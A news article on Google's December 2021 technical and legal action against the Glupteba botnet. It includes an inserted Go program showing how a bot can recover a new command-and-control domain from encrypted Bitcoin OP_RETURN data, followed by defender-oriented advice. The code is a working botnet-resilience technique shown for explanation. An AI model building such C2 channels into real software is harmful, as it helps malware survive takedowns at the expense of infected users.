Google sues two Russians who allegedly operate the 'Glupteba' botnet of about one million devices



Google announced on December 7, 2021 that it had disrupted the infrastructure of the Glupteba botnet, which comprises about one million Windows computers, and that it had filed a lawsuit against two Russians who appear to be its operators. The moves have been cited as an example of a technology company, for which the security of the Internet is essential to its business, pursuing cybercriminals itself, a task traditionally handled by law enforcement agencies.

New action to combat cyber crime

https://blog.google/technology/safety-security/new-action-combat-cyber-crime/



Disrupting the Glupteba operation
https://blog.google/threat-analysis-group/disrupting-glupteba-operation/

Google disrupted the Glupteba botnet used to steal personal information and mine cryptocurrency --The Washington Post
https://www.washingtonpost.com/technology/2021/12/07/google-glupteba-botnet-hack/

Google announces lawsuit, technical action against blockchain botnet Glupteba | ZDNet
https://www.zdnet.com/article/google-announces-lawsuit-and-action-against-blockchain-botnet-glupteba/

Google announced on its official blog on December 7 that it had 'taken action to disrupt the Glupteba botnet, which targets Windows machines and protects itself using blockchain technology.'

A botnet is a network of malware-infected computers under the control of malicious actors, who use the infected devices to steal sensitive information or commit fraud. Glupteba has been tracked by law enforcement agencies and security researchers for many years, since it was first identified in 2011.

The Glupteba malware is said to reach its targets through fake free-software download sites. The image below shows an example of a website that installs the Glupteba malware while posing as a free software download site.



In its blog post, Google wrote: 'After a thorough investigation, we determined that the Glupteba botnet currently involves approximately one million compromised Windows devices worldwide, and it is growing at a rate of thousands of new devices per day. Glupteba is notorious for stealing users' credentials and data, mining cryptocurrencies on infected hosts, and setting up proxies to funnel other people's Internet traffic through infected machines and routers.' Glupteba's operators are also said to have sold stolen Google account credentials and to have sold access to infected devices to other criminals.

Google, which has been tracking and investigating Glupteba for some time, has taken both technical and legal action together with industry partners. On the technical side, Google says that over the past year it terminated 1,183 Google accounts, 908 Google Cloud projects, 870 Google Ads accounts, and about 63 million Google Docs associated with Glupteba. It also reports that Google Safe Browsing warned 3.5 million users who attempted to download malicious files.

In addition, over the preceding days Google worked with Internet infrastructure and hosting providers, including Cloudflare, to take down Glupteba's servers and place warning pages in front of its malicious domains, disrupting the botnet's operations. Google's action appears to have severed Glupteba's primary command-and-control channel, but Glupteba also carries a backup command-and-control mechanism encoded on the Bitcoin blockchain, which could let it recover from the disruption quickly: a domain takedown removes the servers, but nothing Google or a hosting provider controls can remove a record that has already been written to the public blockchain.
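The following Go program (Go is the language Glupteba itself is written in) is an added illustration written for this article, not Glupteba's code. It shows the general technique behind a blockchain-backed fallback channel: the operator publishes a new C2 domain in the OP_RETURN data output of a Bitcoin transaction, encrypted and authenticated with AES-256-GCM under a key the bots carry, and a bot that has lost its hard-coded servers scans the transactions of a known wallet for the first OP_RETURN payload that authenticates. The key, the domain backup-c2.example, the nonce-plus-ciphertext layout and the output scripts are all constructed assumptions of this example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
	"io"
)

// Illustrative key (assumption): a real bot embeds its key in the binary; this one
// is derived from a fixed string so the example runs offline.
var c2Key = sha256.Sum256([]byte("illustrative key, not the botnet's key"))
const (
	opReturn    = 0x6a // script opcode marking an unspendable data output
	opPushData1 = 0x4c // next byte holds the push length (76..255-byte pushes)
)

// BuildOpReturnScript (operator side) builds the scriptPubKey "OP_RETURN <payload>";
// keep payload <= 80 bytes (default datacarriersize) or most nodes will not relay it.
func BuildOpReturnScript(payload []byte) []byte {
	script := []byte{opReturn}
	if len(payload) <= 75 {
		script = append(script, byte(len(payload))) // direct push opcodes 0x01..0x4b
	} else {
		script = append(script, opPushData1, byte(len(payload)))
	}
	return append(script, payload...)
}

// ParseOpReturnPayload returns the pushed data of an OP_RETURN output, or ok=false
// for anything else (P2PKH, P2WPKH, a malformed push, OP_PUSHDATA2/4).
func ParseOpReturnPayload(script []byte) (payload []byte, ok bool) {
	if len(script) < 2 || script[0] != opReturn {
		return nil, false
	}
	n, start := int(script[1]), 2
	if script[1] == opPushData1 && len(script) >= 3 {
		n, start = int(script[2]), 3
	} else if script[1] > 75 { // truncated OP_PUSHDATA1, OP_PUSHDATA2/4, other opcodes
		return nil, false
	}
	if len(script) != start+n {
		return nil, false
	}
	return script[start:], true
}

func gcmForKey() cipher.AEAD {
	block, _ := aes.NewCipher(c2Key[:]) // 32-byte key with AES-GCM: neither call can fail
	gcm, _ := cipher.NewGCM(block)
	return gcm
}

// EncryptC2 (operator side) produces nonce || AES-256-GCM(domain). The GCM tag lets a
// bot ignore every OP_RETURN output on the chain that the key holder did not write.
func EncryptC2(domain string) ([]byte, error) {
	gcm := gcmForKey()
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, []byte(domain), nil), nil
}

// DecryptC2 (bot side) splits off the nonce, verifies the tag and recovers the domain.
func DecryptC2(payload []byte) (string, error) {
	gcm := gcmForKey()
	if len(payload) < gcm.NonceSize()+gcm.Overhead() {
		return "", errors.New("payload too short to hold nonce and tag")
	}
	pt, err := gcm.Open(nil, payload[:gcm.NonceSize()], payload[gcm.NonceSize():], nil)
	if err != nil {
		return "", err // wrong key, tampered data, or an unrelated OP_RETURN output
	}
	return string(pt), nil
}

// RecoverC2 is what a bot does once its hard-coded servers go dark: walk the output
// scripts of the watched wallet's transactions, newest first, and adopt the first
// OP_RETURN payload that authenticates under the embedded key as the new C2 domain.
func RecoverC2(scriptsNewestFirst [][]byte) (string, error) {
	for _, s := range scriptsNewestFirst {
		if data, ok := ParseOpReturnPayload(s); ok {
			if domain, err := DecryptC2(data); err == nil {
				return domain, nil
			}
		}
	}
	return "", errors.New("no authenticated C2 record found")
}

func main() {
	payload, _ := EncryptC2("backup-c2.example") // hypothetical domain, constructed input
	script := BuildOpReturnScript(payload)
	fmt.Println(RecoverC2([][]byte{script}))
}
```

The point for defenders is that the record itself cannot be seized or sinkholed the way a domain or server can; the operator only needs to spend from the wallet once to re-point the whole botnet. Because the bot does not run its own node, it has to fetch that wallet's transaction history from somewhere, typically public blockchain-explorer APIs, so the realistic places to intervene are the lookup (outbound requests to those APIs from hosts that have no business making them) and the wallet address, which can be watched for new transactions as an early warning that a recovery is under way.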

In parallel with the technical action, Google filed a lawsuit in the United States District Court for the Southern District of New York against two Russian nationals, Dmitry Starovikov and Alexander Filippov, who appear to be Glupteba's operators. Google asserts that the two created Google email accounts from the same IP address that was used to send commands to Glupteba, and that it has also linked those Google accounts to a website selling data taken from computers in the botnet.



In the blog post, Google wrote, 'We are working closely with industry and government so that the Internet will be better protected even if Glupteba comes back,' adding, 'Taking such proactive action is important for security. We play our part in understanding, recognizing, and addressing the threats facing the Internet.'

The Washington Post, an American daily newspaper, reported on December 6 that Microsoft had 'seized domains used by a group of hackers based in China,' and observed that 'there is a growing movement by companies such as Microsoft and Google to investigate and take down hackers themselves, work that has traditionally been done mainly by government law enforcement agencies.'

in Software,   Web Service,   Hardware,   Security, Posted by log1h_ik